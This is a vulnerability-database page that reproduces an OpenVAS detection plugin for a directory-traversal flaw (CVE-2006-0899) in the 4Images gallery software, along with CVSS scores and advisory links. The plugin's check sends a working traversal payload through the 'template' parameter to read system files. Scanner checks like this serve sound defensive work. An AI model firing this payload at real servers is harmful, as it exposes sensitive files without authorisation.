Lucene search
Copyright (C) 2006 Ferdy RiphagenOPENVAS:136141256231021020HistoryMar 26, 2006 - 12:00 a.m.
4Images <= 1.7.1 Directory Traversal Vulnerability
2006-03-2600:00:00
Copyright (C) 2006 Ferdy Riphagen
plugins.openvas.org
8
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
6.9 Medium
AI Score
Confidence
Low
0.044 Low
EPSS
Percentile
92.4%
The remote web server is running 4Images which is prone to
directory traversal attacks.
# SPDX-FileCopyrightText: 2006 Ferdy Riphagen
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
# Original advisory / discovered by :
# http://retrogod.altervista.org/4images_171_incl_xpl.html
CPE = "cpe:/a:4homepages:4images";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.21020");
script_version("2023-08-03T05:05:16+0000");
script_tag(name:"last_modification", value:"2023-08-03 05:05:16 +0000 (Thu, 03 Aug 2023)");
script_tag(name:"creation_date", value:"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2006-0899");
script_name("4Images <= 1.7.1 Directory Traversal Vulnerability");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2006 Ferdy Riphagen");
script_dependencies("gb_4images_detect.nasl", "os_detection.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("4images/installed");
script_xref(name:"URL", value:"http://www.4homepages.de/forum/index.php?topic=11855.0");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/16855");
script_xref(name:"URL", value:"http://secunia.com/advisories/19026/");
script_tag(name:"solution", value:"Sanitize the 'index.php' file.");
script_tag(name:"summary", value:"The remote web server is running 4Images which is prone to
directory traversal attacks.");
script_tag(name:"insight", value:"The installed application does not validate user-input passed
in the 'template' variable of the 'index.php' file.");
script_tag(name:"impact", value:"This allows an attacker to execute directory traversal attacks
and display the content of sensitive files on the system and possibly to execute
arbitrary PHP code if he can write to local files through some other means.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"Workaround");
exit(0);
}
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("os_func.inc");
if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );
if( dir == "/" ) dir = "";
files = traversal_files();
foreach file( keys( files ) ) {
url = dir + "/index.php?template=../../../../../../../../" + files[file] + "%00";
if( http_vuln_check( port:port, url:url, pattern:file ) ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
exit( 99 );
Related
nessus
nessus
4Images <= 1.7.1 index.php template Parameter Traversal Local File Inclusion
2006-03-06 00:00:00
prion
prion
Directory traversal
2006-02-27 19:06:00
cvelist
cvelist
CVE-2006-0899
2006-02-27 19:00:00
nvd
nvd
CVE-2006-0899
2006-02-27 19:06:00
cve
cve
CVE-2006-0899
2006-02-27 19:06:00
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
6.9 Medium
AI Score
Confidence
Low
0.044 Low
EPSS
Percentile
92.4%
Related for OPENVAS:136141256231021020